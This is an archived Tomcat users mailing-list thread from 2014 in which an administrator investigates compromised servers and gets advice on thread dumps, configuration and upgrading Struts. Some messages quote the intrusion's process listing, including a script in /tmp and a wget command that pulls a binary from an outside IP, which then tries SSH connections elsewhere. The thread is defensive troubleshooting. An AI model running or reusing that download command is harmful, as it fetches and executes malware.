Re: Regarding i think an intrusion - Solved =)

2014-06-04 Thread Leonardo Santagostini
all for replying to me. Regards, Leonardo Regards.- Leonardo Santagostini http://ar.linkedin.com/in/santagostini 2014-05-05 15:39 GMT-03:00 Martin Gainty mgai...@hotmail.com: Subject: Re: Regarding i think an intrusion From: lsantagost...@gmail.com To: users@tomcat.apache.org

Re: Regarding i think an intrusion

2014-05-26 Thread Leonardo Santagostini
. Regards, Leonardo Regards.- Leonardo Santagostini http://ar.linkedin.com/in/santagostini 2014-05-05 15:39 GMT-03:00 Martin Gainty mgai...@hotmail.com: Subject: Re: Regarding i think an intrusion From: lsantagost...@gmail.com To: users@tomcat.apache.org Hello Chris

Re: Regarding i think an intrusion

2014-05-20 Thread Leonardo Santagostini
://ar.linkedin.com/in/santagostini 2014-05-05 15:39 GMT-03:00 Martin Gainty mgai...@hotmail.com: Subject: Re: Regarding i think an intrusion From: lsantagost...@gmail.com To: users@tomcat.apache.org Hello Chris, but this logfile was only one day. MGAy Caramba! Maybe I had

Re: Regarding i think an intrusion

2014-05-12 Thread Leonardo Santagostini
...@hotmail.com: Subject: Re: Regarding i think an intrusion From: lsantagost...@gmail.com To: users@tomcat.apache.org Hello Chris, but this logfile was only one day. MGAy Caramba! Maybe I had a concept mismatch trying to capture the exact moment when the execution begins. My

Re: Regarding i think an intrusion

2014-05-05 Thread Leonardo Santagostini
Hello all, sorry for the delay, but I was on holiday from Wednesday. OK, I made a ticket for the developers to upgrade Struts. They told me that they will work on that. So, I will keep in touch with the news =) Again, thanks all for all the support you gave me. Regards, Leonardo Regards.- Leonardo

Re: Regarding i think an intrusion

2014-05-05 Thread Leonardo Santagostini
Well, the thread dump is here https://drive.google.com/file/d/0B5oeFmSS7h7EczdXMEF3eXRBSlk/edit?usp=sharing Let me know if I'm missing something. Thanks! Leonardo Regards.- Leonardo Santagostini http://ar.linkedin.com/in/santagostini 2014-05-05 9:34 GMT-03:00 Leonardo Santagostini

Re: Regarding i think an intrusion

2014-05-05 Thread Christopher Schultz
-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA256 Leonardo, On 5/5/14, 10:29 AM, Leonardo Santagostini wrote: Well, the thread dump is here https://drive.google.com/file/d/0B5oeFmSS7h7EczdXMEF3eXRBSlk/edit?usp=sharing Seems like it's broken. - -chris -----BEGIN PGP SIGNATURE----- Version: GnuPG

Re: Regarding i think an intrusion

2014-05-05 Thread Leonardo Santagostini
OK, it's uploaded again. This is the link https://drive.google.com/file/d/0B5oeFmSS7h7EOFE5Nk9KMmd4RFE/edit?usp=sharing Kind regards! Leonardo Regards.- Leonardo Santagostini http://ar.linkedin.com/in/santagostini 2014-05-05 11:57 GMT-03:00 Christopher Schultz

Re: Regarding i think an intrusion

2014-05-05 Thread Christopher Schultz
-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA256 Leonardo, On 5/5/14, 11:12 AM, Leonardo Santagostini wrote: OK, it's uploaded again. This is the link https://drive.google.com/file/d/0B5oeFmSS7h7EOFE5Nk9KMmd4RFE/edit?usp=sharing 1/2 GiB log file? Hrm. It doesn't even have any calls to

Re: Regarding i think an intrusion

2014-05-05 Thread Leonardo Santagostini
Hello Chris, but this logfile was only one day. Maybe I had a concept mismatch trying to capture the exact moment when the execution begins. My command was while [ true ]; do CUENTO=$(ps -fea | grep wget | grep -v grep | grep -v 127.0.0.1 | wc -l); if [ $CUENTO -gt 0 ] ; then PIDJAVA=$(ps -fea

RE: Regarding i think an intrusion

2014-05-05 Thread Martin Gainty
Subject: Re: Regarding i think an intrusion From: lsantagost...@gmail.com To: users@tomcat.apache.org Hello Chris, but this logfile was only one day. MGAy Caramba! Maybe I had a concept mismatch trying to capture the exact moment when the execution begins. My command was while

Re: Regarding i think an intrusion

2014-05-01 Thread Cédric Couralet
2014-04-30 19:07 GMT+02:00 Christopher Schultz ch...@christopherschultz.net : -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA256 Leonardo, On 4/30/14, 12:48 PM, Leonardo Santagostini wrote: I'm uploading my logfiles so they will be available when finished uploading. Remember to get a thread

Re: Regarding i think an intrusion

2014-05-01 Thread Christopher Schultz
-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA256 Cédric, On 5/1/14, 10:00 AM, Cédric Couralet wrote: 2014-04-30 19:07 GMT+02:00 Christopher Schultz ch...@christopherschultz.net : Leonardo, On 4/30/14, 12:48 PM, Leonardo Santagostini wrote: I'm uploading my logfiles so they will be

Re: Regarding i think an intrusion

2014-04-30 Thread Christopher Schultz
-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA256 Konstantin, On 4/29/14, 4:54 PM, Konstantin Kolinko wrote: 2014-04-30 0:41 GMT+04:00 Leonardo Santagostini lsantagost...@gmail.com: Hello Dan, Nope, the attacker is executing locally the following: tomcat 8882 1 0 Apr27 ? 00:00:00

Re: Regarding i think an intrusion

2014-04-30 Thread Leonardo Santagostini
OK, I will do the following: 1) thread dump of the running Tomcat instance 2) Pastebin the running Tomcat config. I think by midday I will have all the info. Thanks all for replying to me and for all the responses. Regards, Leonardo Regards.- Leonardo Santagostini http://ar.linkedin.com/in/santagostini

Re: Regarding i think an intrusion

2014-04-30 Thread Leonardo Santagostini
Hello list, well, my homework is done. Here are the links: setenv.sh: http://pastebin.com/EN1mXDFi catalina.sh: http://pastebin.com/1vRVLbSm web.xml: http://pastebin.com/BqEfiXXm server.xml: http://pastebin.com/wfzE8bYU logging.properties: http://pastebin.com/Qurk8sLU catalina.properties:

Re: Regarding i think an intrusion

2014-04-30 Thread Christopher Schultz
-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA256 Leonardo, You need to post a thread dump as well. - -chris On 4/30/14, 11:35 AM, Leonardo Santagostini wrote: Hello list, well, my homework is done. Here are the links: setenv.sh: http://pastebin.com/EN1mXDFi catalina.sh:

RE: Regarding i think an intrusion

2014-04-30 Thread Martin Gainty
Date: Wed, 30 Apr 2014 12:35:52 -0300 Subject: Re: Regarding i think an intrusion From: lsantagost...@gmail.com To: users@tomcat.apache.org Hello list, well, my homework is done. Here are the links: setenv.sh: http://pastebin.com/EN1mXDFi catalina.sh: http://pastebin.com/1vRVLbSm

Re: Regarding i think an intrusion

2014-04-30 Thread Felix Schumacher
On 30. April 2014 17:35:52 MESZ, Leonardo Santagostini lsantagost...@gmail.com wrote: Hello list, well, my homework is done. Here are the links: setenv.sh: http://pastebin.com/EN1mXDFi catalina.sh: http://pastebin.com/1vRVLbSm web.xml: http://pastebin.com/BqEfiXXm server.xml:

Re: Regarding i think an intrusion

2014-04-30 Thread Leonardo Santagostini
Hello Martin/Felix, I'm uploading my logfiles so they will be available when finished uploading. Regarding the configuration, it's working on two other sites without problem, and there is no problem putting L4 balancing with haproxy in front. I have asked the developers about that exploit, still without an answer.

Re: Regarding i think an intrusion

2014-04-30 Thread Christopher Schultz
-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA256 Leonardo, On 4/30/14, 12:48 PM, Leonardo Santagostini wrote: I'm uploading my logfiles so they will be available when finished uploading. Remember to get a thread dump while Runtime.exec() is running. You should copy the script /tmp/4.sh somewhere

Re: Regarding i think an intrusion

2014-04-30 Thread Leonardo Santagostini
Hello Christopher, thanks for your response. I have a copy of 4.sh and squid (a binary ELF file) and tried to see, using strings, what this program does. I couldn't see anything =( I'm monitoring the server to get a dump at the moment this injection occurs. Files still uploading =( Thanks for

Re: Regarding i think an intrusion

2014-04-29 Thread JB MORLA
Hi, I am learning to set up a server and I found this article about security http://mon-serveur.anael.eu/doku.php/securite/firewall_iptables On Tue, Apr 29, 2014 at 9:08 PM, Leonardo Santagostini lsantagost...@gmail.com wrote: Hello list, I'm facing an issue in 6 Tomcat servers that are

Re: Regarding i think an intrusion

2014-04-29 Thread Daniel Mikusa
On Apr 29, 2014, at 12:08 PM, Leonardo Santagostini lsantagost...@gmail.com wrote: Hello list, I'm facing an issue in 6 Tomcat servers that are getting penetrated, and they are executing malicious scripts on my server. Can you share more about what they are doing? It might give some clues as

Re: Regarding i think an intrusion

2014-04-29 Thread Leonardo Santagostini
Hello Dan, Nope, the attacker is executing locally the following: tomcat 8882 1 0 Apr27 ? 00:00:00 sh /tmp/4.sh tomcat 8893 8882 0 Apr27 ? 00:00:00 wget http://218.199.102.59/.xy/squid32 -O /tmp/squid And then it launches squid, which tries to connect via ssh to various places.

Re: Regarding i think an intrusion

2014-04-29 Thread Leonardo Santagostini
Sorry, but I forgot to post: /usr/java/default/bin/java -version java version 1.6.0_41 Java(TM) SE Runtime Environment (build 1.6.0_41-b02) Java HotSpot(TM) 64-Bit Server VM (build 20.14-b01, mixed mode) Regards.- Leonardo Santagostini http://ar.linkedin.com/in/santagostini 2014-04-29

Re: Regarding i think an intrusion

2014-04-29 Thread Konstantin Kolinko
2014-04-30 0:41 GMT+04:00 Leonardo Santagostini lsantagost...@gmail.com: Hello Dan, Nope, the attacker is executing locally the following: tomcat 8882 1 0 Apr27 ? 00:00:00 sh /tmp/4.sh tomcat 8893 8882 0 Apr27 ? 00:00:00 wget http://218.199.102.59/.xy/squid32 -O